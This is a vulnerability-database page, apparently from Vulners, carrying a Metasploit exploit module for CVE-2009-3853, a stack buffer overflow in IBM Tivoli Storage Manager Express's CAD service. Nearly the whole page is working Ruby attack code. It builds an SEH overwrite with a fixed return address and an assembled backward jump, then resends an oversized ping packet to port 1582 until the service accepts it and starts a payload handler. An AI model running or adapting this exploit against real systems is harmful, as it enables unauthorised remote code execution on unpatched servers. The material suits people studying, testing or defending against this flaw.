IBM Tivoli Storage Manager Express CAD Service Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

IBM Tivoli Storage Manager Express CAD Service Buffer Overflow. Stack buffer overflow in IBM Tivoli Storage Manager Express CAD Service allows arbitrary code execution by sending a "ping" packet with a long string


                                                ##
# $Id: ibm_tsm_cad_ping.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;IBM Tivoli Storage Manager Express CAD Service Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.
				By sending a &#34;ping&#34; packet containing a long string, an attacker can execute arbitrary code.

				NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order
				for the vulnerable code to be reached. This state doesn&#39;t appear to be reachable when the
				TSM server is not running. This service does not restart.
			},
			&#39;Author&#39;         =&#62; [ &#39;jduck&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9262 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2009-3853&#39; ],
					[ &#39;OSVDB&#39;, &#39;59632&#39; ]
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;seh&#39;,
				},
			&#39;Privileged&#39;     =&#62; true,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 380, # offset to seh is 384
					&#39;BadChars&#39; =&#62; &#39;&#39;, # none!
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					# this target should be pretty universal..
					# dbghelp.dll is shipped with TSM Express, and hasn&#39;t been kept up-to-date..
					[ &#39;IBM Tivoli Storage Manager Express 5.3.6.2&#39;, { &#39;Ret&#39; =&#62; 0x028495d3 } ], # p/p/r dbghelp.dll v6.0.17.0
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Nov 04 2009&#39;))

		register_options( [ Opt::RPORT(1582) ], self.class )
	end

	def exploit

		print_status(&#34;Trying target %s...&#34; % target.name)

		# wchar_t buf[64];

		#print_status(&#34;Generating sploit data...&#34;)
		distance = payload_space + 8
		backjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, &#34;jmp $-&#34; + distance.to_s).encode_string
		copy_len = distance + backjmp.length + (1024*3)

		sploit = [0,copy_len].pack(&#39;n*&#39;)
		sploit &#60;&#60; payload.encoded
		sploit &#60;&#60; generate_seh_record(target.ret)
		sploit &#60;&#60; backjmp
		# force hitting end of the stack
		sploit &#60;&#60; rand_text(1024) * 3

		data = [sploit.length,0x26,0xa5].pack(&#39;nCC&#39;)
		data &#60;&#60; sploit

		got_it = false
		while not got_it
			connect
			print_status(&#34;Sending nasty ping request...&#34;)
			sock.put(data)

			begin
				buf = sock.get_once(-1, 5)
			rescue
				print_status(&#34;Hrm, the service is probably in the wrong state, stand by...&#34;)
				disconnect
				select(nil, nil, nil, 5)
				next
			end
			got_it = true
		end

		print_status(&#34;Starting handler...&#34;)
		handler
		disconnect
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1